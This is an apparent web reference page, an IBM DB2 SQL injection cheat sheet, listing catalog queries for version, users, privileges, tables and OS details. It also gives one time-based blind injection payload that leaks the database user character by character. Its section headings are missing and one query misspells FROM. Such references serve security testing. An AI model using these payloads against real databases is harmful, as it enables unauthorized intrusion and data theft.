The SQL Injection Wiki project aims to provide all bells and whistles about SQL Injection. It is a good reference for both seasoned web security professionals and those who are just starting. This project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the below list of databases:

The SQL Injection Wiki is sponsored by Netsparker, an automated false positive free web vulnerability scanner. Download a free trial.

IBM DB2 SQL Injection Cheat Sheet

 

 

Back to top

  • SELECT service_level FROM table(sysproc.env_get_inst_info()) as instanceinfo
  • SELECT getvariable('sysibm.version') FROM sysibm.sysdummy1 -- (v8+)
  • SELECT prod_release, installed_prod_fullname FROM table(sysproc.env_get_prod_info()) as productinfo
  • SELECT service_level,bld_level FORM sysibmadm.env_inst_info

Back to top

  • SELECT blah FROM foo -- comment like this (double dash)

Back to top

  • SELECT user FROM sysibm.sysdummy1
  • SELECT session_user FROM sysibm.sysdummy1
  • SELECT system_user FROM sysibm.sysdummy1

Back to top

DB2 uses OS accounts. Those with DB2 access can be retrieved with:
  • SELECT distinct(authid) FROM sysibmadm.privileges -- priv required
  • SELECT grantee FROM syscat.dbauth -- incomplete results
  • SELECT distinct(definer) FROM syscat.schemata -- more accurate
  • SELECT distinct(grantee) FROM sysibm.systabauth -- same as previous

Back to top

N/A (OS User Accounts)

Back to top

  • SELECT * FROM syscat.tabauth -- shows priv on tables
  • SELECT * FROM syscat.tabauth where grantee = current user -- shows privs for current user

Back to top

  • SELECT distinct(grantee) FROM sysibm.systabauth where CONTROLAUTH='Y'

Back to top

  • SELECT current server FROM sysibm.sysdummy1

Back to top

  • SELECT distinct(table_catalog) FROM sysibm.tables

Back to top

  • SELECT name, tbname, coltype FROM sysibm.syscolumns -- also valid syscat and sysstat

Back to top

  • SELECT table_name FROM sysibm.tables
  • SELECT name FROM sysibm.systables

Back to top

  • SELECT tbname FROM sysibm.syscolumns WHERE name='username'

Back to top

  • SELECT name FROM (SELECT * FROM sysibm.systables ORDER BY name ASC fetch first N rows only) ORDER BY name DESC fetch first row only

Back to top

  • SELECT substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b

Back to top

  • SELECT bitand(1,0) FROM sysibm.sysdummy1 -- returns 0

Also available bitandnot, bitor, bitxor, bitnot.

Back to top

  • SELECT chr(65) FROM sysibm.sysdummy1 -- returns 'A'

Back to top

  • SELECT ascii('A') FROM sysibm.sysdummy1 -- returns 65

Back to top

  • SELECT cast('123' as integer) FROM sysibm.sysdummy1
  • SELECT cast(1 as char) FROM sysibm.sysdummy1

Back to top

  • SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1 -- returns 'abc'
  • SELECT 'a' || 'b' FROM sysibm.sysdummy1 -- returns 'ab'

Back to top

Seems only allowed in stored procedures. Use case logic instead.

Back to top

  • SELECT CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END FROM sysibm.sysdummy1

Back to top

SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”.

Works without select too.

Back to top

Heavy queries, for example:

  • ' and (SELECT count(*) FROM sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (SELECT ascii(substr(user,1,1)) FROM sysibm.sysdummy1)=68

If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response. However, if user doesn’t start with ascii 68, the heavy query won’t execute and thus the response will be faster.

Back to top

  • SELECT xmlagg(xmlrow(table_schema)) FROM sysibm.tables -- returns all in one xml-formatted string
  • SELECT xmlagg(xmlrow(table_schema)) FROM (SELECT distinct(table_schema) FROM sysibm.tables) -- Same but without repeated elements
  • SELECT xml2clob(xmelement(name t, table_schema)) FROM sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.

Back to top

N/A

Back to top

Seems it’s only allowed from procedures or UDFs.

Back to top

I think this is only available through stored procedures or DB2 tool.

Back to top

  • SELECT os_name,os_version,os_release,host_name FROM sysibmadm.env_sys_info -- requires priv

Back to top

  • SELECT * FROM sysibmadm.reg_variables WHERE reg_var_name='DB2PATH' -- requires priv

Back to top

  • SELECT dbpartitionnum, name, value FROM sysibmadm.dbcfg where name like 'auto_%' -- Requires priv.
Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.

  • SELECT name, deferred_value, dbpartitionnum FROM sysibmadm.dbcfg -- Requires priv. 
Retrieve all the database configuration parameters values stored on disk for all database partitions.

Back to top

What makes sense for DB2 is to know default System Schemas (and maybe tables):

  • SYSIBM
  • SYSCAT
  • SYSSTAT
  • SYSPUBLIC
  • SYSIBMADM
  • SYSTOOLS

Back to top